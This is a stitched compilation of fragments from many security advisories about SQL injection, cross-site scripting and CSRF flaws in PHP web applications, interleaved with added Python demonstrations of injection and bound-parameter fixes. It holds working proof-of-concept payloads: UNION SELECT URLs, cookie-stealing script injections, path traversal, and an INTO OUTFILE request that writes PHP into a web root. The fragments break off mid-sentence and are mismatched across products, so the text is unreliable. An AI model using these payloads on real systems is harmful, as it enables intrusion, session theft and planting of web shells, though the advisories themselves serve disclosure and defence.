SQL query
1. SQL injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. the unsanitized user-submitted parameter "origmsg" is used in an SQL query
Preconditions:
1. the attacker must be logged in as a valid user
Test:
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
be exploited to insert arbitrary HTML and script code, which will be
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
Successful exploitation of this vulnerability requires the attacker to be registered and logged in.
2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
//Connect to database
include ("../includes/dbinfo.php");
// Update the password: $Password2 and $ID are concatenated straight into the
// statement, so a single quote in either value changes the SQL itself
$sqlquery = "UPDATE " . usersdb . " SET "
."Password ='" .$Password2 ."' WHERE ID ='" .$ID ."'";
$results = mysql_query($sqlquery);
-----------------[ source code end ]-----------------------------------
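As an added example (not part of the advisory or of the affected application), the UPDATE above mirrored in Python against an in-memory SQLite table: the ID value "' OR '1'='1" widens the WHERE clause so every password is overwritten, while the bound-parameter form changes nothing. The table name "users", its columns and the sample rows are constructed for this example and stand in for the MySQL table named by the usersdb constant.

```python
import sqlite3

# Constructed sample rows (not from the advisory); ID is stored as text because
# the PHP snippet quotes it inside the statement.
SAMPLE_USERS = [("1", "alice", "old-a"), ("2", "bob", "old-b"), ("3", "carol", "old-c")]


def fresh_db():
    """In-memory SQLite table standing in for the MySQL table named by usersdb."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (ID TEXT, Name TEXT, Password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_update_sql(user_id, new_password):
    """Same string concatenation as the PHP snippet: both values land inside the SQL text."""
    return ("UPDATE users SET Password ='" + new_password
            + "' WHERE ID ='" + user_id + "'")


def update_password_vulnerable(conn, user_id, new_password):
    """Executes the concatenated statement and returns the number of rows it changed."""
    cur = conn.execute(vulnerable_update_sql(user_id, new_password))
    conn.commit()
    return cur.rowcount


def update_password_fixed(conn, user_id, new_password):
    """Hardened form: bound parameters keep the values out of the SQL grammar."""
    cur = conn.execute("UPDATE users SET Password = ? WHERE ID = ?",
                       (new_password, user_id))
    conn.commit()
    return cur.rowcount


def passwords(conn):
    """Current Password column, ordered by ID, for inspecting the effect of an update."""
    return [row[0] for row in conn.execute("SELECT Password FROM users ORDER BY ID")]


if __name__ == "__main__":
    injected_id = "' OR '1'='1"  # closes the quoted ID and appends an always-true condition
    conn = fresh_db()
    print(vulnerable_update_sql(injected_id, "pwned"))
    print("vulnerable rows changed:", update_password_vulnerable(conn, injected_id, "pwned"))
    conn = fresh_db()
    print("fixed rows changed:", update_password_fixed(conn, injected_id, "pwned"))
```

With the vulnerable function the statement becomes `UPDATE users SET Password ='pwned' WHERE ID ='' OR '1'='1'`, which matches every row; the same injected ID passed as a bound parameter matches no row at all.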
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Help Desk Software, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "user" POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
The following PoC code is available:
http://[host]/index.php?message=1&message_type=%22%20onmouseover=alert%28document.cookie%29%3E
4) Input passed via the "user2" GET parameter to ask_information.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/ask_information.php?common_lessons=1&user1=professor&user2=%27%20union%20select%201,version%28%29%20--%20
GET /phpshop/admpanel/ HTTP/1.1
Cookie: log="><script>alert(document.cookie)%3b</script>
7) Input passed via the "id" GET parameter to /phpshop/admpanel/catalog/adm_catalog_new.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/phpshop/admpanel/catalog/adm_catalog_new.php?id=3%20AND%201=1
BookLibrary component for Joomla, which can be exploited by malicious
people to conduct SQL injection attacks.
1) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "lend_request") is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "bid[]" parameter to index.php (when "option"
is set to "com_booklibrary" and "task" is set to "save_lend_request")
is not properly sanitised before being used in a SQL query. This can
http://[host]/comm/clients.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
http://[host]/commande/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
Successful exploitation of these vulnerabilities requires that Apache's "AcceptPathInfo" directive is set to "on" or "default" (the default value is "default").
2) Input passed via the "sortfield", "sortorder" and "sall" GET parameters to /user/index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/user/index.php?sall=1%%27%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14%20--%20
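As an added example (not from either advisory or the affected applications), the two PoC query strings above decoded the way the web server decodes them before the script reads $_GET, then the ask_information.php payload run through a concatenated query and through a bound-parameter query. The table "common_lessons", its columns and rows are constructed for this example; SQLite stands in for MySQL, so the PoC's version() is swapped for sqlite_version() before execution.

```python
import sqlite3
from urllib.parse import unquote

# Query-string values copied from the two PoC URLs above.
USER2_PAYLOAD = "%27%20union%20select%201,version%28%29%20--%20"
SALL_PAYLOAD = ("1%%27%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,"
                "version%28%29,3,4,5,6,7,8,9,10,11,12,13,14%20--%20")


def decode_payload(encoded):
    """Percent-decode once, as the web server does before the script reads $_GET.
    Hex-encoded keywords (%75%6e%69%6f%6e) decode to plain 'union', so a filter
    that only inspects the raw query string misses them."""
    return unquote(encoded)


def fresh_db():
    """Constructed table for ask_information.php; the real schema is not in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE common_lessons (user1 TEXT, user2 TEXT, lesson TEXT)")
    conn.executemany("INSERT INTO common_lessons VALUES (?, ?, ?)",
                     [("professor", "student1", "algebra"),
                      ("professor", "student2", "physics")])
    conn.commit()
    return conn


def vulnerable_sql(user1, user2):
    """The PHP pattern the advisory describes: parameters concatenated into the statement."""
    return ("SELECT user2, lesson FROM common_lessons WHERE user1 = '" + user1
            + "' AND user2 = '" + user2 + "'")


def lessons_vulnerable(conn, user1, user2):
    """Runs the concatenated query; a UNION payload appends attacker-chosen rows."""
    return conn.execute(vulnerable_sql(user1, user2)).fetchall()


def lessons_fixed(conn, user1, user2):
    """Bound parameters: the payload is compared as data and matches no row."""
    return conn.execute(
        "SELECT user2, lesson FROM common_lessons WHERE user1 = ? AND user2 = ?",
        (user1, user2)).fetchall()


def sqlite_payload(encoded):
    """The PoC calls MySQL's version(); SQLite spells it sqlite_version()."""
    return decode_payload(encoded).replace("version()", "sqlite_version()")


def engine_version():
    """Version string the injected sqlite_version() call will return."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print(decode_payload(USER2_PAYLOAD))
    print(decode_payload(SALL_PAYLOAD))
    conn = fresh_db()
    print(vulnerable_sql("professor", sqlite_payload(USER2_PAYLOAD)))
    print(lessons_vulnerable(conn, "professor", sqlite_payload(USER2_PAYLOAD)))
    print(lessons_fixed(conn, "professor", sqlite_payload(USER2_PAYLOAD)))
```

The decoded sall payload, `1%') union select 1,version(),3,...,14 -- `, shows the shape of the target statement: the value sits inside a LIKE pattern closed by `')`, and the fourteen selected columns must match the column count of the original SELECT for the UNION to parse.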
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
1. 'id' SQL injection
Vulnerability found in contact.php script.
The user-supplied "id" variable is not properly sanitized before being used in an SQL query.
This can be used to execute arbitrary SQL queries.
2. 'email' SQL injection
The vulnerable script is contact.php.
The 'email' parameter is not properly sanitized before being used in an SQL query.
========
1.1
A remote SQL injection vulnerability has been detected in DHTMLX v3.0 Professional and Standard Edition.
The vulnerability allows a remote attacker or a local low-privileged user account to inject and execute their own SQL commands
on the affected application's DBMS. Successful exploitation of the vulnerability results in DBMS and application compromise.
The vulnerability is located in the SQL query module of the database administrator function, which allows injection into
the database tables via a POST request.
Vulnerable Module(s):
[+] SQL Query - Command Module
entire dataset of usernames and passwords is passed to the workstation
to parse and authenticate. Any network sniffer can catch the dataset
to be cracked offline.
"No Encryption" databases pass every password in plain text as it is
returned from the SQL query.
"Standard Encryption" databases use a rotational encryption to secure
the password as it is returned from the SQL query.
"Enhanced Encryption" databases use the Standard Encryption and then
save it into a binary data field which is then returned from the SQL
query.
The following PoC code is available:
http://[host]/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
5) Input passed via the "login[username]" POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/admin/new_attributes_include.php?cPath=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Multiple SQL Injections in osCmax: CVE-2012-1665
2.1 Input passed via the "status" GET parameter to /admin/stats_monthly_sales.php is not properly sanitised before being used in an SQL query. This can be exploited to alter SQL queries.
Exploitation is limited to the "INTO OUTFILE" clause. The vulnerability requires administrative privileges, but it can be exploited via CSRF: the remote attacker induces a logged-in website administrator to open the following URL (for example, in a hidden iframe):
http://[host]/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'
Depending on the MySQL and PHP configuration and on file system permissions (the MySQL account needs the FILE privilege and secure_file_priv must allow writing to the target directory), this PoC creates an arbitrary PHP file within the web root.
####################
+--> Blind SQL Injection
The archive page is vulnerable to SQL injection. The GET variable 'view'
is not sanitized correctly in the SQL query. This hole can be used to
extract the admin password. For details see the 'Exploits' section.
####################
- Exploits/PoCs:
exploited to manipulate SQL queries by injecting
arbitrary SQL code. The following is the affected code:
// "mealid" is read with no type filter (such as 'int'), so it is not coerced to a
// number, and it is placed unquoted in the VALUES list
$mealid = JRequest::getVar('mealid');
$SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby)
VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')";
// The same unfiltered value is concatenated into the WHERE clause of the DELETE
$mealid = JRequest::getVar('mealid');
$SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";";
allows the injection of direct SQL commands. By exploiting the
vulnerability, an attacker gains access to all records stored in the
database. In this instance of SQL injection, the vulnerability can
additionally be used to get access to other user accounts and their
data. During the creation of an account group by a non-sysadmin user
the account group name is not validated and is used in a SQL query.
This allows for the injection of arbitrary SQL code. The account group
creation can be accessed from the menu -> Master Data -> More ->
Account Groups.
Some of the new features include:
* Added multithreading support to set the maximum number of concurrent
HTTP requests.
* Implemented SQL shell (--sql-shell) functionality and fixed SQL query
(--sql-query, before called -e) to be able to run whatever SELECT
statement and get its output in both inband and blind SQL injection attacks.
* Added an option (--privileges) to retrieve DBMS users privileges, it
also notifies if the user is a DBMS administrator.
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject an arbitrary SQL query using the "start" parameter of the index.php script.
The "start" parameter is used in an SQL query without any sanitization.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/154/exploit.html
---------Solution----------
--------Description--------
http://evuln.com/vulns/174/description.html
SQL Injection in "wsnuser" Cookie
It is possible to inject an arbitrary SQL query using the "wsnuser" cookie parameter of the "index.php" script.
The "wsnuser" parameter is used in an SQL query without proper sanitization.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/174/exploit.html
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL queries using the "fold" and "site" parameters of the "editCategory.php" and "editSite.php" scripts.
The "fold" and "site" parameters are used in SQL queries without any sanitization.
Condition: magic_quotes: off
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject an arbitrary SQL query using the "id" parameter of the "getURL.php" script.
The "id" parameter is used in an SQL query without any sanitization.
Condition: magic_quotes: off
--------PoC/Exploit--------
LogAnalyzer version 3.4.2 and probably earlier versions suffer from multiple vulnerabilities:
- SQL Injection
1) The script admin/views.php contains an SQL injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into the logcon_views table.
The vulnerability exists because the script fails to sanitize the POST variable "Columns" before using it to build an SQL query.
This PoC creates an arbitrary record in the logcon_views table.
<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
original HTTP POST request.
The following examples show the two queries that are executed when the
<sql> element contains the string "0=1) /* " and the <order_by> element
contains the string "*/)--". User input that is active within an SQL
query is marked with a ">", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "|":
----- Query 1a ---------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
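As an added illustration of the comment-splicing technique described above (example code, not from the advisory or the vulnerable application), in Python against an in-memory SQLite table. The query template, the "events" table and its rows are constructed for this example; the template keeps only the shape the advisory implies, namely <sql> inserted inside a parenthesised WHERE and <order_by> inside a parenthesised ORDER BY, with an application-supplied owner check between them. effective_sql() strips comments the way the SQL parser will, so the commented-out owner check becomes visible.

```python
import re
import sqlite3

OWNER_ID = 1  # the user the application believes is logged in

# Constructed events (not from the advisory); the third row belongs to another user.
SAMPLE_EVENTS = [
    (1, "Standup", "Room 1", "2012-01-02", 1),
    (2, "Audit", "Room 2", "2012-01-03", 1),
    (3, "Board meeting", "Room 9", "2012-01-04", 2),
]


def fresh_db():
    """In-memory SQLite table with the column names that survive in Query 1a."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (EVN_ID INTEGER, evntitle TEXT, evnlocation TEXT,"
                 " evnstartdate TEXT, owner_id INTEGER)")
    conn.executemany("INSERT INTO events VALUES (?, ?, ?, ?, ?)", SAMPLE_EVENTS)
    conn.commit()
    return conn


def build_query(sql_filter, order_by):
    """Constructed template with two injection points: <sql> inside a parenthesised
    WHERE and <order_by> inside a parenthesised ORDER BY. The owner check between
    them is the application-provided part the attacker comments out."""
    return ("SELECT EVN_ID, evntitle, evnlocation FROM events WHERE ((" + sql_filter
            + ") AND owner_id = " + str(OWNER_ID) + ") ORDER BY (" + order_by
            + ") LIMIT 50")


def effective_sql(query):
    """Remove /* */ and -- comments to show what the parser actually sees.
    Illustrative only: it ignores comment markers inside string literals."""
    no_block = re.sub(r"/\*.*?\*/", "", query, flags=re.S)
    return re.sub(r"--.*$", "", no_block, flags=re.M).strip()


def run(conn, sql_filter, order_by):
    """Execute the templated query exactly as the vulnerable application would."""
    return conn.execute(build_query(sql_filter, order_by)).fetchall()


if __name__ == "__main__":
    conn = fresh_db()
    # Legitimate request: only the logged-in owner's matching event comes back
    print(run(conn, "evnlocation = 'Room 1'", "evnstartdate"))
    # The advisory's two strings: the first opens a comment, the second closes it
    print(effective_sql(build_query("0=1) /* ", "*/)--")))
    # Replacing 0=1 with 1=1 drops the owner check and returns everyone's events
    print(run(conn, "1=1) /* ", "*/)--"))
```

With the advisory's exact strings the statement the parser sees is `SELECT EVN_ID, evntitle, evnlocation FROM events WHERE ((0=1) )`: the owner check and the ORDER BY have disappeared into the comment, and the trailing `--` swallows whatever the application appends after the second injection point.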
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM Informix Database Server. SQL query
execution privileges are required to exploit this vulnerability.
The specific flaw exists within the oninit process bound to TCP port
9088 when processing the arguments to the USELASTCOMMITTED option in a
SQL query. User-supplied data is copied into a stack-based buffer
WHERE answerid = " . $vbulletin->GPC['answerid']
);
[----------- source code snippet end -----------]
It appears that the user-submitted parameter "answer" is not properly sanitized
before being used in the SQL query, so SQL injection is possible. The test will
induce an SQL error message:
Invalid SQL:
UPDATE vb_hvanswer
SET answer = 'war'axe'
http://[host]/AgedDebtors.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/AgedSuppliers.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of these vulnerabilities requires that Apache's "AcceptPathInfo" directive is set to "on" or "default" (the default value is "default").
2) Input passed via the "reportid" GET parameter to /reportwriter/ReportMaker.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject an arbitrary SQL query using the "q" parameter of the search.php script.
The "q" parameter is used in an SQL query without any sanitization.
Condition: magic_quotes: off
--------PoC/Exploit--------
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject an arbitrary SQL query using the "postid" parameter of the "postview.php" script.
The "postid" parameter is used in an SQL query without any sanitization.
Condition: magic_quotes: off
--------PoC/Exploit--------